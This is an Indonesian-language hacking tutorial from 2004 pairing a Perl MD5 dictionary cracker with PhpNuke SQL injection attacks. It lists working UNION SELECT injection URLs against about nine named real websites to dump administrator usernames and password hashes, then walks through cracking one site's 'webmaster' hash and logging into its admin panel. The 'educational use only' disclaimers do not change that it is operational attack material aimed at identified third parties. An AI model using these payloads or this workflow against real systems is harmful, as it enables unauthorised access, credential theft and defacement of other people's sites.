/*********************************************************
 * Simple md5 hash cracker
 * (dictionary attack)
 * 
 *
 * oleh    : iko (iko94@yahoo.com)
 * www.geocities.com/iko94
 *
 * release : august,23,2004
 *
 * No Warranty. This tutorial is for educational use only, 
 * commercial use is prohibited.
 *
 **********************************************************/


Sebelum kita mulai, anda bisa lihat-lihat referensi berikut:
1. PhpNuke Multiple Vulnerabilities (Downloads Module) 
   (www.securiteam.com/unixfocus/5HP0F20CUK.html)
2. Mass Scanning menggunakan perl script & google
   pada hole terbaru PhpNuke.
   (http://www.geocities.com/iko94/tutorials/tut_005.txt)

Anda tahu bahwa yang kita peroleh adalah nama user dan
password dalam bentuk hash md5.

Nah, bagaimana cara mengetahui md5 hash password tadi ?
Anda bisa menggunakan program-program md5cracker dari
internet (coba google).

Penulis mencoba memberikan alternatif md5 cracker berbasis
dictionary attack. Artinya kita mencoba satu per satu
string yang berasal dari file kamus, dan membandingkannya
dengan hash password yang kita cari tadi (collision).

Sebelumnya, anda harus memiliki file kamus yang lengkap 
dan sesuai dengan kebutuhan anda :)
Anda bisa mencoba mencari di :
www.cotse.com/tools/wordlists1.htm
ada banyak pilihan di situ, anda tinggal mencocokkan dengan 
kebutuhan anda saja.

Berikut adalah perl skrip yang berisi simple md5 cracker tadi :

******************* cut here *********************************
#!/usr/bin/perl
#

use Digest::MD5 qw(md5_hex);
use Getopt::Std;

getopts('k:m:');
our($opt_k, $opt_m);

my $wordlist = $opt_k;
my $hashku = $opt_m;

$baner=<<END
Simple MD5 hash cracker (dictionary attack) ...

by bima(iko94\@yahoo.com)
\twww.geocities.com/iko94

:))

Usage: perl $0 -k <file kamus> -m <md5 hash>  
Example : perl $0 -k kamus.txt -m "6742923575546471370cc028f289db40" \n
END
;
print($baner);


open(UF, "<$wordlist") || die "\nI can't open the wordlist\n";
@username=<UF>;
close(UF);
$tanda=0;

foreach $elemen(@username){
 chomp($elemen);
 print "proses $elemen ::: \n";
 $kamusku=md5_hex($elemen);

 if ($kamusku eq $hashku) {
   print "ternyata string === $elemen === cocok dng hash $kamusku \n";
   $tanda=1;
   last;
 } #of if

} #of foreach

if ($tanda==0) {print "Gagal total, coba wordlist yang lain :(\n"}

# [EOF]

******************* cut here *********************************

OK, sementara itu anda membutuhkan file wordlist, misal kamus.txt :

******************* cut here *********************************
satu
dua
tiga
empat
lima
enam
******************* cut here *********************************

Lengkap tool kita kali ini, kita coba menjalankannya:

D:\Dokumen\perl-ku\lab\md5>md5.pl -k kamus.txt -m 6742923575546471370cc028f289db
40
Simple MD5 hash cracker (dictionary attack) ...

by bima(iko94@yahoo.com)
        www.geocities.com/iko94

:))

Usage: perl D:\Dokumen\perl-ku\lab\md5\md5.pl -k <file kamus> -m <md5 hash>
Example : perl D:\Dokumen\perl-ku\lab\md5\md5.pl -k kamus.txt -m "6742923575546471370cc028f289db40"

proses satu :::
proses dua :::
proses tiga :::
proses empat :::
proses lima :::
ternyata string === lima === cocok dng hash 6742923575546471370cc028f289db40

D:\Dokumen\perl-ku\lab\md5>

Contoh di atas memperlihatkan kita sedang meng-crack md5 hash :
6742923575546471370cc028f289db40
dengan menggunakan file wordlist :
kamus.txt

Nah sekarang penulis akan memberikan contoh bagaimana memperoleh md5 hash password.
Coba buka url ini di browser anda :
http://hamzah-haz.com/phpver/modules.php?name=Search&type=stories&query=f00bar&category=-1&categ=%20and%201=2%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0%20from%20nuke_authors/*
lalu cari bagian :
*************************************
Search Results


 d9656e5a2b31793f8259311342543661
Contributed by webmaster
Posted by 0 on Minggu, 00 0000
Topic: (No Comments)
*************************************

Nah lo...  :))
(sekali lagi, penulis hanya berusaha menganalisa dan memahami,
mengapa situs ini bisa di-deface, penulis *TIDAK ADA* hubungan
dengan peristiwa ter-deface-nya situs tersebut sesaat lalu).

Kita dapatkan md5 hash password :
d9656e5a2b31793f8259311342543661
dengan user bernama webmaster .

Anda bisa meng-cracknya dengan menjalankan perintah :
D:\Dokumen\perl-ku\lab\md5>md5.pl -k kamus.txt -m d9656e5a2b31793f8259311342543661

Setelah anda berhasil menemukan string passwordnya, coba 
anda login ke :
http://hamzah-haz.com/phpver/admin.php
Gotcha... buuummmm...
Selamat... anda berhasil masuk sebagai nuke_authors...
:))
Ingat !!! Jangan lakukan hal-hal yang merugikan pihak lain...

Contoh-contoh lain cara mendapatkan md5 hash password :
http://e-paper.elmit.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-1%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0,0,0%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
http://www.cafeduweb.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-1%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0,0,0%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
http://www.unrealdemolition.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-1%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0,0,0%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
http://verificationguild.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-1%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0,0,0%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
http://www.game-times.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-1%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0,0,0%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
http://www.emaculation.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-1%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0,0,0%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
http://www.hageeks.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-1%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0,0,0%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
http://www.shukwit.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-1%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0,0,0%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

Nah, cukup sekian tutorial kali ini, semoga bisa membuka
cakrawala pikiran anda tentang dunia keamanan internet.


*TODO :
[+] Fasilitas Resume
[+] Brute Force Attack

*very very very special greetz to:
[+][+][+] my beloved anna [+][+][+]

*special greetz to: 
[+] www.neoteker.or.id
[+] www.echo.or.id
[+] www.bosen.net
[+] sakitjiwa
[+] ftp_geo
[+] all #1stlink #neoteker #e-c-h-o #batamhacker #kartubeben #antihackerlink crew @ dal net
[+] all #1stlink #neoteker #romance #hackers crew @ centrin
[+] alphacentupret, boeboe, fuzk3 kendi
[+] y3d1ps, z3r0byt3

*iko berterimakasih kepada:
[+] qq
[+] tiyox
[+] keputih group
[+] everyone who shouting the freedom

*iko tidak berterimakasih kepada:
[-] monopoli
[-] birokrasi
[-] para penjilat
[-] koruptor
[-] closed source

kirimkan kritik && saran ke iko94@yahoo.com

[EOF]